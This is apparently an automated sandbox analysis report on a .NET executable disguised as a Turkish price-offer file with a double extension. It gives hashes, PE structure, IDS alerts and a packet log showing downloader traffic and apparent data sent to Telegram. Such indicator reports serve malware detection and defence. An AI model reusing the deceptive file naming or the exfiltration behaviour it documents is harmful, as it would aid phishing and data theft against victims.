                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):60
                                                                                      Entropy (8bit):4.038920595031593
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                      Malicious:false
                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                      Category:dropped
                                                                                      Size (bytes):1835008
                                                                                      Entropy (8bit):4.4171318437224105
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:2cifpi6ceLPL9skLmb0mZSWSPtaJG8nAgex285i2MMhA20X4WABlGuNo5+:Ti58ZSWIZBk2MM6AFByo
                                                                                      MD5:AED094A1816E5C1D86EA48A86D121007
                                                                                      SHA1:23482F9BB49292B2107D0F5CB0796C1C5E1FA812
                                                                                      SHA-256:ED2CDE174FFC4916D253D833012E9AAB1FBFEFB03ED194748F490DA629CDFDEB
                                                                                      SHA-512:E42665D25CA2AACB0B9400389B81CD2A5025FBC56787C4FE515AF8DB546047252CFDE752AD4DE158E82854E8C99DD11ADDC965EC809C0453E094E109EACDA6DF
                                                                                      Malicious:false
                                                                                      Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm^R.t.b..............................................................................................................................................................................................................................................................................................................................................8.@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.853456188943149
                                                                                      TrID:
                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                      File name:fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                      File size:754'688 bytes
                                                                                      MD5:1579f7d1a5af2d811a9ade177ca3ed73
                                                                                      SHA1:e126dbb23a1c841a934e5b73bcfebc1c28bd906d
                                                                                      SHA256:1d35d406169afe6bed77759d2e8e03c858897a7e181e3a83bb013f16c91af4bd
                                                                                      SHA512:2271e6c5c1494641f0d96a593b72a29203c0c4d1fc1440dc51a9784d3300a02bd6dfcf3a77f9efe8b84aef12b19097e0dd155dfe379536dca55d3e7cea135e30
                                                                                      SSDEEP:12288:X4doaex+/ZpqCV8W4TFhPPAZD373dAGZ+WMTRnqdmqy+czNKFARjaNIkATn747og:IdFexZCV8jDIV3aWCRnkmqaNAARhN6
                                                                                      TLSH:26F412D46E46DD9AC4C107B10A31E33AA5BA9E9ED416C34BCBECEDFF7811B4A64441E0
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.sg..............0..^...$.......}... ........@.. ....................................@................................

                                                                                      File Icon

                                                                                      Icon Hash:53952576d1abd26e

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x4b7d92
                                                                                      Entrypoint Section:.text
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x400000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x6773A830 [Tue Dec 31 08:15:44 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      jmp dword ptr [00402000h]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add al, byte ptr [eax]
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax], al

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xb7d400x4f.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb80000x21a0.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xbc0000xc.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000xb5db80xb5e006dea0bdde733c295a9a13d9d43cac1bfFalse0.9309546821305842data7.859436491693461IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0xb80000x21a00x220047522dc5ec171da2e756a65c7b902c0cFalse0.8990119485294118data7.4748185459962535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0xbc0000xc0x20062e03e9b06ca1d9e27c20e764f8b1ed7False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0xb80c80x1d72PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9698859113823295
                                                                                      RT_GROUP_ICON0xb9e4c0x14data1.05
                                                                                      RT_VERSION0xb9e700x32cdata0.4642857142857143

                                                                                      Imports

                                                                                      DLLImport
                                                                                      mscoree.dll_CorExeMain

                                                                                      Network Behavior

                                                                                      Suricata IDS Alerts

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2025-01-09T19:01:08.878234+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749701132.226.8.16980TCP
                                                                                      2025-01-09T19:01:10.346958+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749701132.226.8.16980TCP
                                                                                      2025-01-09T19:01:10.974086+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749706104.21.112.1443TCP
                                                                                      2025-01-09T19:01:12.315945+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749710132.226.8.16980TCP
                                                                                      2025-01-09T19:01:16.259787+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749717104.21.112.1443TCP
                                                                                      2025-01-09T19:01:19.226865+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749732104.21.112.1443TCP
                                                                                      2025-01-09T19:01:23.325700+01001810007Joe Security ANOMALY Telegram Send Message1192.168.2.749757149.154.167.220443TCP
                                                                                      2025-01-09T19:01:30.229729+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.749804149.154.167.220443TCP

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 9, 2025 19:01:07.215271950 CET4970180192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:07.220129013 CET8049701132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:07.220196962 CET4970180192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:07.220386982 CET4970180192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:07.448111057 CET8049701132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:08.508838892 CET8049701132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:08.516191006 CET4970180192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:08.521100044 CET8049701132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:08.832552910 CET8049701132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:08.877245903 CET49704443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:08.877293110 CET44349704104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:08.877410889 CET49704443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:08.878233910 CET4970180192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:08.884020090 CET49704443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:08.884036064 CET44349704104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:09.515625000 CET44349704104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:09.515805006 CET49704443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:09.576200962 CET49704443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:09.576237917 CET44349704104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:09.577270031 CET44349704104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:09.628189087 CET49704443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:09.777872086 CET49704443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:09.819350958 CET44349704104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:09.893542051 CET44349704104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:09.893610001 CET44349704104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:09.893663883 CET49704443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:09.900268078 CET49704443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:09.903422117 CET4970180192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:09.908718109 CET8049701132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:10.188575983 CET8049701132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:10.193212986 CET49706443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:10.193262100 CET44349706104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:10.193321943 CET49706443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:10.193937063 CET49706443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:10.193948984 CET44349706104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:10.346957922 CET4970180192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:10.782092094 CET44349706104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:10.803428888 CET49706443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:10.803447962 CET44349706104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:10.974123955 CET44349706104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:10.974219084 CET44349706104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:10.974323988 CET49706443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:10.975020885 CET49706443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:10.979851007 CET4970180192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:10.981053114 CET4971080192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:10.985135078 CET8049701132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:10.985207081 CET4970180192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:10.985862017 CET8049710132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:10.985929966 CET4971080192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:10.986043930 CET4971080192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:10.990787029 CET8049710132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:12.271039963 CET8049710132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:12.272527933 CET49713443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:12.272552967 CET44349713104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:12.272773027 CET49713443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:12.273008108 CET49713443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:12.273015976 CET44349713104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:12.315944910 CET4971080192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:12.795016050 CET44349713104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:12.805180073 CET49713443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:12.805212021 CET44349713104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:12.959095955 CET44349713104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:12.959156036 CET44349713104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:12.959192991 CET49713443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:12.959659100 CET49713443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:12.964118004 CET4971480192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:12.969063997 CET8049714132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:12.969137907 CET4971480192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:12.969257116 CET4971480192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:12.974061966 CET8049714132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:14.022439003 CET8049714132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:14.023880005 CET49715443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:14.023957014 CET44349715104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:14.024085045 CET49715443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:14.024472952 CET49715443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:14.024498940 CET44349715104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:14.065794945 CET4971480192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:14.490102053 CET44349715104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:14.493474960 CET49715443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:14.493496895 CET44349715104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:14.621176958 CET44349715104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:14.621246099 CET44349715104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:14.621454000 CET49715443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:14.622347116 CET49715443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:14.625482082 CET4971480192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:14.627573013 CET4971680192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:14.630516052 CET8049714132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:14.631371021 CET4971480192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:14.632368088 CET8049716132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:14.632652998 CET4971680192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:14.632700920 CET4971680192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:14.637506962 CET8049716132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:15.443716049 CET8049716132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:15.444860935 CET49717443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:15.444925070 CET44349717104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:15.444979906 CET49717443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:15.445231915 CET49717443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:15.445250988 CET44349717104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:15.487643957 CET4971680192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:16.101151943 CET44349717104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:16.102766991 CET49717443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:16.102793932 CET44349717104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:16.259803057 CET44349717104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:16.259871960 CET44349717104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:16.260155916 CET49717443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:16.260691881 CET49717443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:16.270791054 CET4971680192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:16.276295900 CET8049716132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:16.277179956 CET4971680192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:16.280672073 CET4971880192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:16.285550117 CET8049718132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:16.285623074 CET4971880192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:16.285727024 CET4971880192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:16.290534019 CET8049718132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:17.106971025 CET8049718132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:17.108148098 CET49720443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:17.108177900 CET44349720104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:17.108551979 CET49720443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:17.108552933 CET49720443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:17.108580112 CET44349720104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:17.159658909 CET4971880192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:17.633590937 CET44349720104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:17.639012098 CET49720443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:17.639054060 CET44349720104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:17.770756960 CET44349720104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:17.770837069 CET44349720104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:17.770885944 CET49720443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:17.771300077 CET49720443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:17.774909019 CET4971880192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:17.776036978 CET4972680192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:17.780010939 CET8049718132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:17.780071020 CET4971880192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:17.780949116 CET8049726132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:17.781085014 CET4972680192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:17.781234026 CET4972680192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:17.786072016 CET8049726132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:18.607762098 CET8049726132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:18.608983994 CET49732443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:18.609015942 CET44349732104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:18.609071016 CET49732443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:18.609339952 CET49732443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:18.609354973 CET44349732104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:18.659542084 CET4972680192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:19.071065903 CET44349732104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:19.072854996 CET49732443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:19.072882891 CET44349732104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:19.226891994 CET44349732104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:19.226958036 CET44349732104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:19.227328062 CET49732443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:19.229377985 CET49732443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:19.230657101 CET4972680192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:19.232389927 CET4973380192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:19.235716105 CET8049726132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:19.237234116 CET8049733132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:19.237277031 CET4972680192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:19.237364054 CET4973380192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:19.237478018 CET4973380192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:19.242239952 CET8049733132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:20.016908884 CET8049733132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:20.018487930 CET49739443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:20.018537998 CET44349739104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:20.018624067 CET49739443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:20.018892050 CET49739443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:20.018904924 CET44349739104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:20.065808058 CET4973380192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:20.523164988 CET44349739104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:20.525696993 CET49739443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:20.525717974 CET44349739104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:20.687428951 CET44349739104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:20.687503099 CET44349739104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:20.687596083 CET49739443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:20.688124895 CET49739443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:20.691267967 CET4973380192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:20.692538977 CET4974580192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:20.696353912 CET8049733132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:20.696428061 CET4973380192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:20.697335958 CET8049745132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:20.697406054 CET4974580192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:20.697515965 CET4974580192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:20.702708960 CET8049745132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:21.469355106 CET8049745132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:21.470865011 CET49751443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:21.470904112 CET44349751104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:21.470977068 CET49751443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:21.471204996 CET49751443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:21.471221924 CET44349751104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:21.519067049 CET4974580192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:22.076098919 CET44349751104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:22.078277111 CET49751443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:22.078294039 CET44349751104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:22.349579096 CET44349751104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:22.349643946 CET44349751104.21.112.1192.168.2.7
                                                                                      Jan 9, 2025 19:01:22.349745989 CET49751443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:22.350249052 CET49751443192.168.2.7104.21.112.1
                                                                                      Jan 9, 2025 19:01:22.401216984 CET4974580192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:22.406177044 CET8049745132.226.8.169192.168.2.7
                                                                                      Jan 9, 2025 19:01:22.406280994 CET4974580192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:22.408663034 CET49757443192.168.2.7149.154.167.220
                                                                                      Jan 9, 2025 19:01:22.408703089 CET44349757149.154.167.220192.168.2.7
                                                                                      Jan 9, 2025 19:01:22.408787012 CET49757443192.168.2.7149.154.167.220
                                                                                      Jan 9, 2025 19:01:22.409387112 CET49757443192.168.2.7149.154.167.220
                                                                                      Jan 9, 2025 19:01:22.409403086 CET44349757149.154.167.220192.168.2.7
                                                                                      Jan 9, 2025 19:01:23.079978943 CET44349757149.154.167.220192.168.2.7
                                                                                      Jan 9, 2025 19:01:23.080060005 CET49757443192.168.2.7149.154.167.220
                                                                                      Jan 9, 2025 19:01:23.082784891 CET49757443192.168.2.7149.154.167.220
                                                                                      Jan 9, 2025 19:01:23.082794905 CET44349757149.154.167.220192.168.2.7
                                                                                      Jan 9, 2025 19:01:23.083048105 CET44349757149.154.167.220192.168.2.7
                                                                                      Jan 9, 2025 19:01:23.085030079 CET49757443192.168.2.7149.154.167.220
                                                                                      Jan 9, 2025 19:01:23.127331972 CET44349757149.154.167.220192.168.2.7
                                                                                      Jan 9, 2025 19:01:23.325712919 CET44349757149.154.167.220192.168.2.7
                                                                                      Jan 9, 2025 19:01:23.325787067 CET44349757149.154.167.220192.168.2.7
                                                                                      Jan 9, 2025 19:01:23.325858116 CET49757443192.168.2.7149.154.167.220
                                                                                      Jan 9, 2025 19:01:23.332140923 CET49757443192.168.2.7149.154.167.220
                                                                                      Jan 9, 2025 19:01:29.529589891 CET4971080192.168.2.7132.226.8.169
                                                                                      Jan 9, 2025 19:01:29.581335068 CET49804443192.168.2.7149.154.167.220
                                                                                      Jan 9, 2025 19:01:29.581368923 CET44349804149.154.167.220192.168.2.7
                                                                                      Jan 9, 2025 19:01:29.581454992 CET49804443192.168.2.7149.154.167.220
                                                                                      Jan 9, 2025 19:01:29.581665039 CET49804443192.168.2.7149.154.167.220
                                                                                      Jan 9, 2025 19:01:29.581681013 CET44349804149.154.167.220192.168.2.7
                                                                                      Jan 9, 2025 19:01:30.228252888 CET44349804149.154.167.220192.168.2.7
                                                                                      Jan 9, 2025 19:01:30.229556084 CET49804443192.168.2.7149.154.167.220
                                                                                      Jan 9, 2025 19:01:30.229568958 CET44349804149.154.167.220192.168.2.7
                                                                                      Jan 9, 2025 19:01:30.229687929 CET49804443192.168.2.7149.154.167.220
                                                                                      Jan 9, 2025 19:01:30.229692936 CET44349804149.154.167.220192.168.2.7
                                                                                      Jan 9, 2025 19:01:30.735744953 CET44349804149.154.167.220192.168.2.7
                                                                                      Jan 9, 2025 19:01:30.737011909 CET44349804149.154.167.220192.168.2.7
                                                                                      Jan 9, 2025 19:01:30.737078905 CET49804443192.168.2.7149.154.167.220
